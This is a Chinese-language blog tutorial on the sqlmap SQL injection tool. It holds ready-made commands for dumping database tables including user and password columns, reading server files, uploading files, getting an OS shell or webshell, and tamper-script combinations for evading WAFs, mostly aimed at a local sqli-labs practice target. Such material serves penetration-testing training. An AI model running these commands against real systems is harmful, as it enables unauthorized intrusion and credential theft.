附上一个别人总结的:https://www.cnblogs.com/ichunqiu/p/5805108.html

一套基础的sqlmap语句:

python sqlmap.py -u "http://xxxxx/x?id=1" --dbs(或者--current-db)
python sqlmap.py -u "http://xxxxx/x?id=1" -D database_name --tables
python sqlmap.py -u "http://xxxxx/x?id=1" -D database_name -T table_name --columns
python sqlmap.py -u "http://xxxxx/x?id=1" -D database_name -T table_name -C "id,user,password" --dump

用到的参数

--technique    sqlmap中的注入技术
--batch 默认选择,自动运行
--current-db 当前数据库
--current-user 当前数据库用户名
--is-dba 查看当前用户是否为管理员权限
--data post型注入时的post数据
--threads 最大并发线程(不要超过10)
-r 跟http请求头的头部文件.txt
--cookie cookie注入
--level 探测等级,3最好,5最全面
--sql-shell 运行自定义sql语句
--os-shell 运行操作系统命令
--file-read 从数据库中读取文件
--file-write "本机路径" --file-dest "服务器路径" 上传文件
--tamper 跟自带绕过脚本
--time-sec=60 延时,用来绕waf
过WAF
--identify-waf 检测是否有waf
--random-agent -v 使用任意浏览器进行绕过
--hpp -v 使用HTTP 参数污染进行绕过
--proxy=211.211.211.211: --proxy-cred=: 使用代理
--flush-session 清空会话,重构注入
--hex 进行字符码转换
--mobile 对移动端的服务器进行注入
--tor 匿名注入
--delay=3.5 --time-sec= 使用长的延时来避免触发WAF的机制

0x01 --technique参数

—technique是为sqlmap中的注入技术,在sqlmap中其支持5中不同模式的注入

B:Boolean-based-blind  (布尔型盲注)
E:Error-based (报错型注入)
U:Union query-based (联合注入)
S:Starked queries (通过sqlmap读取文件系统、操作系统、注册表必须 使用该参数,可多语句查询注入)
T:Time-based blind (基于时间延迟注入)

例如sqlmap语句:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-5/?id=1" --technique E --dbs --batch

0x02 --data参数和--threads参数

post注入时,post的数据就放在--data后,--threads加快跑的速率,不要超过10

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/?id=1" --data "uname=1&passwd=11&submit=Submit"
--technique UES
--dbms mysql --dbs --threads 8

0x03 -r参数

将HTTP请求包的内容放在一个txt文件里面,cookie可以不用放,然后-r跟上txt文件的路径,让sqlmap自动跑,这里要注意将可能出现sql注入的请求参数的值后面要跟上”*“符号

python sqlmap.py -r 1.txt --dbs --threads 8 --technique BTES
或者
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-18/" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*" --level 4 --dbs --threads 10 --technique BEST

如果知道sql注入的确切位置,那么这里可以直接使用第二种方式注入

0x04 --cookie参数

web应用基于cookie的身份验证,对于post请求,可以指定cookie,cookie注入时直接使用这个参数
sqlmap -u "url" --cookie="..." --level 3 –-dbs

0x05 --os-shell 参数

知道数据库为管理员权限,并且知道网址根目录,那么使用这一个参数,可以上传webshell和反弹shell。

用--is-dba查看是否为管理员权限

0x06 --file-read参数

知道网站的一些文件的目录,或者网站服务器里面的固定文件的目录,那么可以使用这个参数来读取文件内容:

python sqlmap.py -u "http://127.0.0.1/?id=1" --file-read "C:/windows/win.ini"

0x07 --file-write  --file-dest参数

--file-write "本机选择上传文件的路径" --file-dest "服务器根目录路径"  
知道一个站点存在sql注入且知道网站根目录的前提下可使用此参数

0x08 --tamper 参数

--tamper参数专门跟一些脚本的,比如说sqlmap自带的一些绕过的脚本

python sqlmap.py xxxx --tamper "脚本名"

常用的绕过脚本:

apostrophemask.py 用utf8代替引号
equaltolike.py 对等号的绕过,用like代替等号
greatest.py MySQL中绕过过滤’>’
space2hash.py 绕过空格的过滤
halfversionedmorekeywords.py mysql数据库绕过防火墙
ase64encode.py 将语句用base64编码
between.py 替换>号
space2plus.py 用+替换空格
chardoubleencode.py 双url编码
randomcase.py 随机大小写
randomcomments.py 用/**/分割sql关键字

0x09 tamper脚本参数组合策略绕过WAF

针对mysql数据库:

--random-agent -v  -delay=3.5 --tamper=space2hash.py,modsecurityversioned.py

--random-agent --hpp  --tamper=space2mysqldash.p,versionedmorekeywords.py

-delay=3.5  ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=apostrophemask.py,equaltolike.py

针对mssql

-delay=3.5  ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=randomcase.py,charencode.py

--delay=3.5 --hpp --tamper=space2comment.py,randomcase.py

--delay=3.5 --time-sec=  --tamper=space2mssqlblank.py,securesphere.py

--delay=3.5 --tamper=unionalltounion.py,base64encode.p

针对oracle:

--delay= --random-agent --hpp --tamper=unmagicquotes.py,unionalltounion.py

--delay=--user-agent =“Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/ Firefox/36.0” --hpp --tamper=charunicodeencode.py,chardoubleencode.py

sqlmap注入基本教程的更多相关文章

  1. SQLMAP注入教程-11种常见SQLMAP使用方法详解

    sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了.今天把我一直 ...

  2. sqlmap注入教程

    1.SQLMAP用于Access数据库注入 (1)猜解是否能注入win: python sqlmap.py -u "http://www.stronkin.com/en/CompHonorB ...

  3. 使用sqlmap注入DVWA的SQL Injection菜单

    1 使用sqlmap注入DVWA的SQL Injection菜单 本教程中的登陆地址:http://192.168.0.112/dvwa/login.php 1.1 获取cookie信息 1) 使用a ...

  4. sqlmap注入小结

    sqlmap注入时: 1.判断可注入的参数 2.判断可以用那种SQL注入技术来注入 3.识别出哪种数据库 4.根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可 ...

  5. sqlmap注入入门

    sqlmap注入入门 sqlmap的用法: ​ linux中: sqlmap [选项] ​ Windows中: python sqlmap [选项] 常用的参数及含义: 目标 ​ -d DIRECT ...

  6. sqlmap 注入的方法及技巧

    sqlmap 注入的方法及技巧 当给 sqlmap 这么一个 url 的时候,它会: 1.判断可注入的参数 2.判断可以用那种 SQL 注入技术来注入 3.识别出哪种数据库 4.根据用户选择,读取哪些 ...

  7. Sqlmap注入工具

    Sqlmap注入工具 http://sqlmap.org/ Sqlmap是国外的一个免费的注入工具,基于python开发,支持现在几乎所有的数据库,支持get.post.cookie注入,可以添加co ...

  8. 在windows系统和kali中通过sqlmap注入

    第1章 在windows系统中通过sqlmap注入 1.1 环境搭建 Sqlmap是目前功能最强大,使用最为广泛的注入类工具,是一个开源软件,被集成于kaliLinux, 由于sqlmap是基于Pyt ...

  9. sql-labs 18-20(sqlmap注入)

    这三题主要是关于HTTP头部的注入 常见的HTTP注入点产生位置为 [Referer].[X-Forwarded-For].[Cookie].[X-Real-IP].[Accept-Language] ...

随机推荐

  1. 2020年,手把手教你如何在CentOS7上一步一步搭建LDAP服务器的最新教程

    同步滚动:关 什么是LDAP 什么是LDAP? 要想知道一个概念,最简单的办法就是wikipedia,当然也可以百科. LDAP全称是轻型目录访问协议(Lightweight Directory Ac ...

  2. 一本彻底搞懂MySQL索引优化EXPLAIN百科全书

    1.MySQL逻辑架构 日常在CURD的过程中,都避免不了跟数据库打交道,大多数业务都离不开数据库表的设计和SQL的编写,那如何让你编写的SQL语句性能更优呢? 先来整体看下MySQL逻辑架构图: M ...

  3. ospf路由协议源码学习

    目前,主要有两个版本的源码实现,一是quagga,一是bird. quagga的代码大概有3-4万行,有提到unnumbered interface, bird的代码大概1万行,但没有提到unnumb ...

  4. 终于成功部署 Kubernetes HPA 基于 QPS 进行自动伸缩

    昨天晚上通过压测验证了 HPA 部署成功了. 所使用的 HPA 配置文件如下: apiVersion: autoscaling/v2beta2 kind: HorizontalPodAutoscale ...

  5. delphi制作res文件

    第一步:将brcc32.exe拷贝到某个目录,如“res文件”第二步:制作rc文件1.在“res文件”中新建一个文本文件resources.rc:2.文本文件中每一行写一个资源,资源格式为:资源标识名 ...

  6. bootstrap4网格

    Bootstrap 4 网格系统有以下 5 个类: .col- 针对所有设备 .col-sm- 平板 - 屏幕宽度等于或大于 576px .col-md- 桌面显示器 - 屏幕宽度等于或大于 768p ...

  7. 「C++ 」借来的资源,何如还的潇洒?

    前言 本文的内容将专门对付内存管理,培养起有借有还的好习惯,方可消除资源管理的问题. 正文 所谓的资源就是,一旦用了它,将来必须还给系统.如果不是这样,糟糕的事情就会发生. C++ 程序内常见的资源: ...

  8. BFC的语法

    先说一下什么是BFC(Block Formatting Contexts) BFC:块级格式化上下文(独立的渲染区).通俗的说是块级元素布局逻辑或规则,想要触发BFC就要是块级元素,要不把它转为块级元 ...

  9. RabbitMQ安装(发生系统错误5。拒绝访问。发生系统错误1067。进程意外终止。)

    RabbitMQ安装步骤(windows) 1.RabbitMQ建立在强大的Erlang OTP平台上,因此我们首先需要安装Erlang. 2.接下来安装RabbitMQ服务rabbitmq-serv ...

  10. go 算法与数据结构

    数据结构 稀疏数组 package main import "fmt" /* 稀疏数组 案例:五子棋存盘与复盘 节省存储空间 */ type ValNode struct { ro ...